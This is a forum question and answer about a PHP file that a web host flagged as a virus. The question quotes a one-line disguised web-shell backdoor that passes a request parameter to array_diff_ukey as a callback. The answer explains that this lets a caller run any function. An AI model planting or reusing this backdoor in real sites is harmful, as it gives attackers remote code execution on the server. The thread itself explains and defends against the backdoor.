My web-hosting sent me a warning about one of my files claiming that file is a virus threat. Can you please explain to me why this piece of code is wrong? Thank you
<?php @array_diff_ukey(@array((string)$_REQUEST['password']=>1),@array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']);
?>
分享 The callback to use for the array_diff() can be specified by the user ($_REQUEST['login']), so whatever function they specify in the login field of the request (or in the URL) will be executed by this code. That makes it dangerous.
You're not even checking whether the values you get come from $_POST or $_GET, so you have no control over what gets passed in
分享
